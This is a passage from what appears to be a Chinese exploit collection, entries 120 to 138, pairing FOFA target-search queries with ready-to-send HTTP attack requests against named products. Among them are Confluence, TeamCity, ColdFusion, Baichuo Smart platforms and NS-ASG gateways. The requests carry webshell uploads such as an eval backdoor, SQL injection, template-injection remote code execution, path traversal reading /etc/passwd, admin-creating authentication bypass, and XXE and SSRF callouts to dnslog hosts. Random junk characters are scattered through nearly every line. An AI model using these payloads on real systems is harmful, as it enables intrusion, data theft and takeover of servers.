* }; s8 e9 ?- f; R3 i+ w9 G5 p; U7 YX-Forwarded-For: 1.1.1.1
/ n6 o2 E/ h4 Z: z1 ^9 `6 o4 y" MX-Originating-Ip: 1.1.1.1* r- y/ S$ \: P) Q& w T- j3 Q
X-Remote-Ip: 1.1.1.1
0 e. X5 F* v8 f6 gX-Remote-Addr: 1.1.1.19 V( ]$ U1 |2 \& H% ^; d
Te: trailers
0 V! V/ i7 I* G c l5 n6 a" {Connection: close U8 u& h" {& l/ N; R
2 K& }4 H" X, {* a, D' Isrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456; t6 o7 F0 u2 x3 n) I
. |1 Q$ ~) P9 N5 a5 P
- A/ g5 G/ c: T& u$ W# h+ {120. 北京百绰智能S40管理平台导入web.php任意文件上传
i$ q4 ^# Y2 N' _7 _: sCVE-2024-1253; ?/ J! ^5 }5 M" a
FOFA:title="Smart管理平台"
+ P: H+ p9 j: Q; M( b0 CPOST /useratte/web.php? HTTP/1.1
0 i% l0 n$ `: L9 n/ w8 @ f" YHost: ip:port
, o5 c9 `2 X. h T' _6 tCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
" C" q% G/ a) K I+ ZUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko/ ^7 a% p: `! x- x. S7 f! h. A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# j/ g; r6 e2 d& u2 \( h1 M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( ], E( I+ U- T7 O+ {Accept-Encoding: gzip, deflate9 ~! n; G+ ?& b8 L
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793286 k5 J& S$ z6 T2 h* `2 @
Content-Length: 597
9 a# |! U6 Q/ i% V; v: dOrigin: https://ip:port+ s% m; b% @6 W
Referer: https://ip:port/sysmanage/licence.php
0 H# X, N, H: xUpgrade-Insecure-Requests: 1
; Z4 A; k' U/ _Sec-Fetch-Dest: document$ Q2 O z9 t/ C0 d1 Y' u% [
Sec-Fetch-Mode: navigate
) S& O) x5 q: I1 ?6 j2 r5 S; W* lSec-Fetch-Site: same-origin
6 M9 I5 g# _+ f- jSec-Fetch-User: ?10 }( p; { ^2 I0 J- L
Te: trailers, ] U$ I$ i1 Q% h3 G) |
Connection: close
5 j: l4 M" m8 Y% i# L$ d: ~4 } }+ N+ i. D' _. F* u0 q
-----------------------------42328904123665875270630079328
6 r; P) G1 V1 T2 J+ g9 YContent-Disposition: form-data; name="file_upload"; filename="2.php"
5 Z9 E0 U8 c5 h4 M) m+ p" r: AContent-Type: application/octet-stream. o# l4 d- K( W9 D, t
; h0 G0 {+ \ {5 d$ M$ g<?php phpinfo()?>
% k3 @5 W! i6 |! v& E-----------------------------42328904123665875270630079328
$ F- u# i. P+ O, p6 Z4 s0 zContent-Disposition: form-data; name="id_type"3 U, b) W! O3 K5 s! e& b5 P
/ m5 y) H/ @9 ]7 j6 a3 Y1 m* A1, H- v b; D( \6 C/ }2 w7 }
-----------------------------42328904123665875270630079328& \" g1 |' v. B2 ]8 [6 i- U
Content-Disposition: form-data; name="1_ck", k- [: N2 |5 I4 c2 v: s( f
9 J% r5 B. v# m, {4 W1_radhttp4 R$ x3 @- z9 R% T8 |
-----------------------------42328904123665875270630079328
1 z1 r" U7 v1 Z& W4 [# |, h" P/ p7 v) kContent-Disposition: form-data; name="mode"
( L; z& K+ S3 ? n; d6 D" l
* \! j9 d" p& G* |# n. Wimport. r/ }% E1 j. o8 `3 f; C
-----------------------------42328904123665875270630079328
x0 t: j% V- M$ o1 C' U' F) s; C6 X5 y# g
R6 \2 m8 a; |2 [文件路径/upload/2.php
; C; K7 x8 G8 B1 W1 ]. J% g9 V8 E7 X, C
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
) U; Q* J3 w; L5 N8 ]3 rCVE-2024-1918- |/ T# z$ ?! C9 R
FOFA:title="Smart管理平台"$ }, F5 d1 j% ?, N7 W
POST /useratte/userattestation.php HTTP/1.15 B' j" n3 u% Q' C8 Y: O3 }4 E
Host: 192.168.40.130:8443
; n' Q; S8 v! p+ f' ~& FCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
7 c- i) @$ w% y" o$ ^' g# s2 xUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
. c3 j* n" p& v7 v4 Y4 S# PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, ?& [# k) F `: k0 H% y9 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 e! W% Y, Z/ [4 h
Accept-Encoding: gzip, deflate$ i0 r& l& D) l5 B. Z0 [$ c% m& V7 @+ C
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328& ], u( G" ?' K* U1 o
Content-Length: 592
3 U6 L# ^! a+ L& T% M7 R: f/ sOrigin: https://192.168.40.130:8443
; {/ w7 W- m- @5 oUpgrade-Insecure-Requests: 1
7 b, T I5 w9 I) R- ZSec-Fetch-Dest: document/ ~% k: j5 p6 i: h; Y
Sec-Fetch-Mode: navigate
t$ a% L9 Z Q5 eSec-Fetch-Site: same-origin! ?& m% o2 T9 ?( _
Sec-Fetch-User: ?1* p/ d; V( V2 V- j) q; [
Te: trailers
/ T# ]3 v6 Z: y8 j( ~Connection: close9 j7 R( O) W' {# y) b
% _# P8 s. K+ I7 O-----------------------------42328904123665875270630079328
4 e8 m+ s5 e6 N2 nContent-Disposition: form-data; name="web_img"; filename="1.php"( w4 o) x, ~ g. ], r I
Content-Type: application/octet-stream+ [; @+ M" m# D0 [
5 _* a$ R- y2 Z- ]1 Y) M$ f<?php phpinfo();?># F+ ]7 c6 d! W- B
-----------------------------423289041236658752706300793280 ^" N( i+ X$ \" h
Content-Disposition: form-data; name="id_type"
2 i1 S; x: _7 M+ ]; N# Q- V4 {# i {3 w0 x
15 g- U, V( d" r! k* }
-----------------------------42328904123665875270630079328' {" f4 F( I2 \+ `7 u8 n+ U. ]
Content-Disposition: form-data; name="1_ck"" J( ~5 {6 V* A/ S: _
N' K) w' \% c( E& O; a/ b$ K1_radhttp+ d8 e0 I, P+ `* e; K0 v
-----------------------------42328904123665875270630079328
+ f O5 x' b. n: J, }Content-Disposition: form-data; name="hidwel"# q& U: O& K4 L& c1 u/ l* e8 O5 S
$ y# x8 z4 @1 Y7 n# d
set
t. q! t3 l" b% T-----------------------------42328904123665875270630079328
& R, f! s4 p# K7 M3 T0 J2 d5 z& | h% p" t5 u& q
3 C, X; F3 n. t( s1 D6 j; J' _, S
boot/web/upload/weblogo/1.php
- `9 D4 @) `5 N- F5 r1 b' y/ Y6 I/ _; P H6 _. @% |
122. 北京百绰智能s200管理平台/importexport.php sql注入
8 g/ c; m' i" ICVE-2024-27718FOFA:title="Smart管理平台": |7 h* p4 m2 ?- B
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()" S3 N3 s* c z1 Y
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
4 L4 B, o. J: M. oHost: x.x.x.x
5 S, ]( o( z8 }9 g4 E. X; M6 o4 y# a, QCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0/ G& p( U: J* v7 p c2 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: s1 Z1 c$ ^4 S fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" F& Q; c) E% G: z! ?9 g; rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, b& ^/ P4 |( D, s) P
Accept-Encoding: gzip, deflate, br
0 |0 q) P+ Y" z A) ~" CUpgrade-Insecure-Requests: 1 b8 T$ {! G' w+ \. V) Q& Q
Sec-Fetch-Dest: document+ `0 S* s! b+ a' c/ \
Sec-Fetch-Mode: navigate
; I w& _. r. w/ B7 F1 H, fSec-Fetch-Site: none
/ d, G6 z; E$ K9 K6 O% F. GSec-Fetch-User: ?17 {' C4 W9 ^6 l' W2 a/ D9 d
Te: trailers
' B9 U- N# _& QConnection: close
9 g6 w! v; r' _, e! y
" r' P+ w9 U: N
1 ? t# M) h$ K+ K/ g123. Atlassian Confluence 模板注入代码执行
# b n+ J# o2 c2 s8 \1 RFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
7 Y0 I- `. J4 Q- \7 d XPOST /template/aui/text-inline.vm HTTP/1.1
. d9 ?2 h5 ?' \8 E% Q0 h- V9 x# BHost: localhost:80902 F8 t( g8 {7 T" e. o9 f& N4 C( p
Accept-Encoding: gzip, deflate, br
* G% \& f1 Z f- O7 X4 J" B9 EAccept: */*
7 d# h8 p7 g0 p. [3 A' q7 R: JAccept-Language: en-US;q=0.9,en;q=0.8& L( r$ o$ d( l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
3 Z2 w* y9 X" `6 y% _/ \Connection: close
7 L. v9 U: e( e- M1 s) Z6 LContent-Type: application/x-www-form-urlencoded q7 }1 R! x% z. S
- k4 r, J, D' f- P4 x6 o# S% S
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))# k' l) {; X2 `8 e0 w& M# [3 O
, b5 w2 i# J: `
3 v6 }, H$ H) L3 c4 \' S- E/ k9 k124. 湖南建研工程质量检测系统任意文件上传5 X9 j. K& l% h1 X2 g
FOFA:body="/Content/Theme/Standard/webSite/login.css") X' q% h/ ] m8 \4 q
POST /Scripts/admintool?type=updatefile HTTP/1.1
# w9 J4 v! B( d1 b3 a3 SHost: 192.168.40.130:8282( C( V2 k, {. p8 S! {
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36. c! H3 S. J) \$ `
Content-Length: 72
# s# Q- @- W/ v3 x, x: LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.80 f/ h0 w4 w/ R8 j
Accept-Encoding: gzip, deflate, br6 F1 [ C, ]! d# j- o9 j* o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* ]# z, r. Y( o$ I# c
Connection: close
- `2 S( S6 `- a. m9 ]Content-Type: application/x-www-form-urlencoded" Z% [8 K7 m: _# }' H7 H' ]- R
5 U$ n( \ r* t5 n" x4 b
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>! i6 x4 d, M* E
$ C% @$ @( a. g+ R, q+ D. H" X: p) C5 S& ]* N
http://192.168.40.130:8282/Scripts/abcgcg.aspx
3 i7 a. I7 ^2 q% m( c; I. F' l
3 X3 Y* i: e, v3 ]125. ConnectWise ScreenConnect身份验证绕过; I$ q3 `# g# S# ?+ c2 Q3 `
CVE-2024-1709
) r. K% v* Z. u: J) g }# o/ nFOFA:icon_hash="-82958153"
+ X$ Q+ o* X: zhttps://github.com/watchtowrlabs ... bypass-add-user-poc
3 E2 o# B9 R2 n. w2 t( o0 s
* \% ^! S! p! e: E, K! B$ A) h; }" m( c X b
使用方法/ u7 w( h9 a1 f
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
: ~5 H% o; \, N3 O+ ~' z
8 [- Q: u: Z' M# U# @) {3 f' |5 {8 ]1 y' ^) e
创建好用户后直接登录后台,可以执行系统命令。
' G! w: F9 {" L) o; A! G4 k" C* ?. L5 @! p L& n! e
126. Aiohttp 路径遍历6 f8 V% T" _1 n+ ^( ~3 Q9 H# w
FOFA:title=="ComfyUI"
. I4 M. C4 Z# R1 @- ^GET /static/../../../../../etc/passwd HTTP/1.1% u' {2 t9 C V
Host: x.x.x.x/ W. I$ ~, l8 p, p+ j1 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.368 t$ H/ J3 R( X6 T; g, ~$ V5 Y
Connection: close S+ Y' x& m& r0 J% X1 n2 C& S
Accept: */*8 [# X7 Z* K4 w# z/ m
Accept-Language: en4 h# v" h5 n2 s6 p. x8 y: ~# L( a
Accept-Encoding: gzip
. o; G! E1 S0 P1 i' _, z* H
( I& q! L* E! G4 o! N! y2 G; w6 T7 }" H. ?/ x+ a: b7 |* p
127. 广联达Linkworks DataExchange.ashx XXE
' I6 |9 N" t2 o# X8 NFOFA:body="Services/Identification/login.ashx"
% y! o3 t Z" G2 F8 k* u' P. bPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1- K+ d' R* Q3 h4 y* E' h# @
Host: 192.168.40.130:88886 @8 N( ?; V! r$ D0 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
" m, _9 a9 Z$ aContent-Length: 415* r+ M w9 y% w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& v, Q8 \! H8 E% w4 }- a! P1 tAccept-Encoding: gzip, deflate+ S1 ^- Y* T' S9 M6 f4 O5 y
Accept-Language: zh-CN,zh;q=0.9
" z2 M1 k7 b; u& G. EConnection: close
+ v) l6 @. k) h: R: y/ e4 jContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
! K- K: G5 r" LPurpose: prefetch
0 G& ~6 ?- |" e d& R; u' Y4 h* bSec-Purpose: prefetch;prerender
, U7 f8 k7 X+ M {' U/ e2 M) K8 p/ T( o! A! S+ x/ ^+ ]
------WebKitFormBoundaryJGgV5l5ta05yAIe0% y- v; I2 o0 n2 t d( ^
Content-Disposition: form-data;name="SystemName"3 e m$ M( ]% x
2 X" ]% w" ~3 D1 s0 z+ wBIM Z$ K8 j$ M8 B( \5 N/ Q& @
------WebKitFormBoundaryJGgV5l5ta05yAIe0$ ?( D ~9 N8 H [. `! [
Content-Disposition: form-data;name="Params"9 ]3 v/ D( ~ a8 E# ]0 S) U
Content-Type: text/plain
. @0 b* y- `& I# c; _; x$ F @# R4 ^2 A1 k
<?xml version="1.0" encoding="UTF-8"?> r' G( h5 K& j1 K1 `
<!DOCTYPE test [
; T7 h+ B @0 K- V* x<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
; |. r$ x* e% u$ b]
3 y/ f& [) ?* D>) X0 H+ _. R n' B. R0 U9 r) D4 ^
<test>&t;</test>0 r2 C% Z/ p' ^( b/ B( u, J
------WebKitFormBoundaryJGgV5l5ta05yAIe0--: V, C! S/ N, Y8 `+ o" i
( h1 `7 k- C3 ~$ Y+ `" L* G
' P/ w! `6 V( E- l3 c! h* a/ a4 S6 T3 w1 F
128. Adobe ColdFusion 反序列化% ?) V& h# X2 L- b, w
CVE-2023-38203
# ~( X: s' @7 |* m* H5 mAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)3 z. Z" |' b' K1 {. S- m: L" @
FOFA:app="Adobe-ColdFusion"
4 `- d, C+ o1 d- X* e6 GPAYLOAD3 o1 T! w& [ P+ a8 s
& N9 s- A2 B* _3 a+ o* G
129. Adobe ColdFusion 任意文件读取
% s: d% H0 e* ~CVE-2024-207678 n6 Z) u5 d8 o- P Y; ]
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
3 [+ B- w; i% u" ]0 c$ c第一步,获取uuid
' r" D# e" A: SGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.19 C ^- E, _( c o% @6 B
Host: x.x.x.x0 v+ z( [7 c# B$ H7 q8 `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36! k$ A7 r8 q8 n* s
Accept: */*
( Y1 C# U9 o0 M' S0 B) R! P9 pAccept-Encoding: gzip, deflate
* m# Y+ [7 L$ C/ `. o5 c' }- GConnection: close# ~+ E2 m4 Y! m2 n/ K2 P9 T
4 @+ ?2 G9 i, K1 @% `
: q+ f4 z1 N( |9 j* _
第二步,读取/etc/passwd文件
9 c. ^! G; f, `8 O) T/ ~GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
' L. J5 t- I4 O7 jHost: x.x.x.x% @1 q& @; ]& P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36. E) O1 A4 s! ^; E! b8 q% }
Accept: */*
; g7 r- g* _% W8 i8 s# @Accept-Encoding: gzip, deflate
: M6 y) L. O% u, K: B; o$ f& [& A( m5 CConnection: close6 f. l3 c' ^4 p. |; @8 B7 ~
uuid: 85f60018-a654-4410-a783-f81cbd5000b90 d- d' G& _# [
1 }2 {/ t5 b0 k/ n) Q8 n2 h" c8 U4 m$ q: Y$ K3 y3 r
130. Laykefu客服系统任意文件上传
; k: j0 r8 [1 S, r) V3 {6 u+ k( ?( fFOFA:icon_hash="-334624619"' a8 V6 ~2 T# ]. G8 O( R
POST /admin/users/upavatar.html HTTP/1.1: [ w, y9 [) k* [, ~' l- F; _$ @
Host: 127.0.0.11 A! @5 G! T) |& m0 q
Accept: application/json, text/javascript, */*; q=0.01
1 R& X2 t! }' {* W/ [X-Requested-With: XMLHttpRequest
( Q' o1 V9 W; [) ZUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.267 U2 p8 I6 U7 M( d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
/ b' x4 q6 |6 Y! |Accept-Encoding: gzip, deflate: Z3 I O a+ i1 V9 @1 L n/ B
Accept-Language: zh-CN,zh;q=0.9
5 Q+ Z t6 I1 H- Y: SCookie: user_name=1; user_id=3
2 a" a( C0 g# [0 t: CConnection: close3 u+ B& e. e2 r* q% q" j
7 U. w" G5 T1 Z3 ]1 k' o6 @& y. y------WebKitFormBoundary3OCVBiwBVsNuB2kR
! j2 A7 l6 _2 a8 M3 o9 Y: ^' g" ]4 tContent-Disposition: form-data; name="file"; filename="1.php"
/ U7 t( S4 p$ UContent-Type: image/png4 V( U) Q: J9 n; U6 ^
, X# J9 x; L0 z
<?php phpinfo();@eval($_POST['sec']);?>
! f$ J {4 {+ k: M------WebKitFormBoundary3OCVBiwBVsNuB2kR--) E* F# G" _# U1 k* K
9 C! Q# H; D% B: I) b- u( s- L O6 I! }
# v' y8 p+ o6 D$ J9 u3 {8 ]1 [/ @131. Mini-Tmall <=20231017 SQL注入( C7 B" D1 N8 Z9 [2 C* j- a0 Z
FOFA:icon_hash="-2087517259"
8 M5 L7 b: a! q后台地址:http://localhost:8080/tmall/admin
/ c' e6 W8 U, v }8 ?3 _http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
- V6 l1 n; r( _. u7 w: L: D. b
a' Y) U) [! @7 {' Z132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过9 p q8 w, K" U5 I
CVE-2024-27198
N y V5 N* ~1 s' ^8 qFOFA:body="Log in to TeamCity"
. Q8 L8 \! R0 d4 r& f4 p: iPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
' ~8 E* @( I$ ?- a: t6 L- f5 EHost: 192.168.40.130:8111" s9 r- Q& [+ F8 j6 f: o$ h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 x' Q, W1 {) {* e
Accept: */** ~. H( m+ S. ^5 `. r
Content-Type: application/json' |4 C( s0 E9 a1 K$ G F( k
Accept-Encoding: gzip, deflate9 v' ?: W5 E4 M1 u" Q
! B( `# C; O4 {" T3 S5 X{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}+ P, i9 D2 m- I
& x9 A( N/ Y- [* [ N
/ [/ x. f7 j6 z+ e5 w9 yCVE-2024-27199- d* M6 E. s8 X5 r% _8 t
/res/../admin/diagnostic.jsp
1 f m1 z, g5 D& \' f, G/.well-known/acme-challenge/../../admin/diagnostic.jsp1 u, B1 ?, E. Q! M/ I
/update/../admin/diagnostic.jsp
: W* @6 t/ A: p" L o& t! U
- E0 A A) _" d/ W! n# U7 f) j( y0 w6 Y% W
CVE-2024-27198-RCE.py+ n1 X4 }; }1 v& m+ }
: h" j8 G! j9 ]3 ]! @- W! \" l
133. H5 云商城 file.php 文件上传
3 ]7 }0 O5 P$ n7 }: m; C3 d8 P* A. |FOFA:body="/public/qbsp.php"
$ l r; z; M+ j2 p. w8 vPOST /admin/commodtiy/file.php?upload=1 HTTP/1.15 O; ?" F( T! p0 U, `& q
Host: your-ip
* G- ?) d1 u6 a7 I; o8 }' `( k- [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
, V! z$ T; m: L' |/ i9 d! lContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx! W; v' u& ]7 }! _0 E# A
" B' @; w3 s+ c6 A8 _
------WebKitFormBoundaryFQqYtrIWb8iBxUCx8 a( T" B- r+ l1 f% j. l& J( C
Content-Disposition: form-data; name="file"; filename="rce.php"7 \5 A# }/ D& `9 }# n7 n( P
Content-Type: application/octet-stream
' `4 A8 `9 z$ J7 P
2 x# Q3 u. \& f3 j; g5 W<?php system("cat /etc/passwd");unlink(__FILE__);?>
: U+ h; C. J4 H- h- V* ?: s% M------WebKitFormBoundaryFQqYtrIWb8iBxUCx--$ C; ~4 s9 }' f2 x. J$ P
/ E/ g% h T: t( p2 {6 A/ R" G* y
1 Y# w7 ~4 M+ y# Q: B" P+ Q1 x4 l1 Z% H- Q3 f k" f- N4 s7 b! B
134. 网康NS-ASG应用安全网关index.php sql注入
6 Z! x- H' ?- T2 A( T5 f" a; ZCVE-2024-2330
/ B: J8 u! F/ INetentsec NS-ASG Application Security Gateway 6.3版本
G L$ S) p5 J- ^8 IFOFA:app="网康科技-NS-ASG安全网关"
+ V- C% x% q1 W6 `3 O" x& N- ZPOST /protocol/index.php HTTP/1.1
4 S" Q7 V+ ?# @7 l) {: RHost: x.x.x.x* B3 L# r9 L6 J( n9 N
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
6 P: _% v# J# dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
6 b) m* d' G: a( \; `) QAccept: */*
0 p* x9 T, x$ UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 l' T4 B' v H% R& T! |6 U' L8 i
Accept-Encoding: gzip, deflate/ K/ S$ ], T& ]; K
Sec-Fetch-Dest: empty S( ~/ p' q7 [* p( a6 z8 j6 a
Sec-Fetch-Mode: cors
( k% s5 \$ _6 f, k9 ~" T9 m& k: |Sec-Fetch-Site: same-origin
# G# Z( g! s E# t9 OTe: trailers6 V0 X) t. c/ _3 ]
Connection: close
- t; y+ H2 D9 q+ H- b: n) lContent-Type: application/x-www-form-urlencoded
. |" _, z1 [7 K4 i0 L% Z; DContent-Length: 263
0 C. _# z2 ?" i2 a7 b8 J4 ]$ m ?6 Z* b& i ?$ c( g
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}+ k6 i( D9 ~/ |6 y% G
$ M$ U! K* @+ @# Q
9 P1 }3 M( ?/ E: \' e135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入) o, ?' `1 V" G
CVE-2024-2022( n2 a. ?1 N9 v! d
Netentsec NS-ASG Application Security Gateway 6.3版本4 `! C% U& B8 ?' V" p% z3 F
FOFA:app="网康科技-NS-ASG安全网关"
3 S( V {, D4 BGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.15 S& l% F* A6 I& F! S! `
Host: x.x.x.x
3 c" n+ b7 Z% O X( K# M; e7 \9 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 o# L9 a& x, {5 C z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) @0 X! E& ]; O: K& aAccept-Encoding: gzip, deflate
3 C) r4 p: i' i1 U# @Accept-Language: zh-CN,zh;q=0.9
# K5 i. R! o, {: p2 n6 n$ F" ~6 YConnection: close
1 v0 ^/ V7 {# C2 M/ F# L5 K
2 E1 {: ]9 j. X" b2 ], x! g0 l M* K- h4 W8 {5 Y
136. NextChat cors SSRF
" ]" m9 @1 Z: g8 i! H4 _CVE-2023-497851 _5 d( {9 [' S$ T
FOFA:title="NextChat"! t' g6 d5 w! R, Z% \9 L! v0 S7 F2 I3 r
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1- H6 l6 F" F0 [' S' ]8 M2 N$ q9 ^
Host: x.x.x.x:10000
7 e! @3 R& y/ F# w8 u4 pUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36) c0 E, m e' y/ ?& j) L' i, p5 Q/ z/ J; n
Connection: close; t0 D! ], S$ [/ z( b( ?' p
Accept: */*) j* ?- Z5 N9 n+ H& Z# g/ i: O
Accept-Language: en
^, E' w5 P- C+ VAccept-Encoding: gzip
9 p8 [2 H* e, m$ m0 K
& r) m) y( R# l0 M; |6 C! b
: F9 U8 P( `: k' Y* P. e- \4 A7 A137. 福建科立迅通信指挥调度平台down_file.php sql注入 S! Y! T. @% _& l
CVE-2024-2620
- r' G) z/ m3 P% { @FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
8 x' p( \8 @7 {7 Z5 F! mGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1- R- W. s! Z* Q; ]& q
Host: x.x.x.x
4 {* s; k% w, r1 x2 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.00 d$ U6 l' b: T9 k2 o& d! I/ }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 H0 z3 T4 o$ s3 S3 A8 Q" C9 h: c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! l& a+ W% `6 o2 `4 O* vAccept-Encoding: gzip, deflate, br
' V" U5 ]8 H# P3 K4 F$ N! Z, Z- HConnection: close! S6 t; Y( C/ J4 e# [
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj( k. k, j! e( B' i% x. n0 U5 S) ~8 |
Upgrade-Insecure-Requests: 1) g( `8 ~) b: L# q3 c
4 d+ [5 V4 H: _0 p
4 J: j5 [ E; |4 B ?. h. f3 }138. 福建科立讯通信指挥调度平台pwd_update.php sql注入6 l& P9 \2 n" T9 A; w6 w
CVE-2024-2621
& `) d% G4 e' j O) vFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
$ {: x2 n& B5 z' CGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
1 `* G9 G# u4 \3 m* iHost: x.x.x.x
h4 h$ S! U* ]3 n( P% x, G3 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
! `7 |5 z) p$ m6 r; c, iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ g3 |: v% {* {* S1 E3 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( a6 m6 t- Y' t5 C; v2 tAccept-Encoding: gzip, deflate, br
0 K( g# \! O; U+ R8 c) nConnection: close
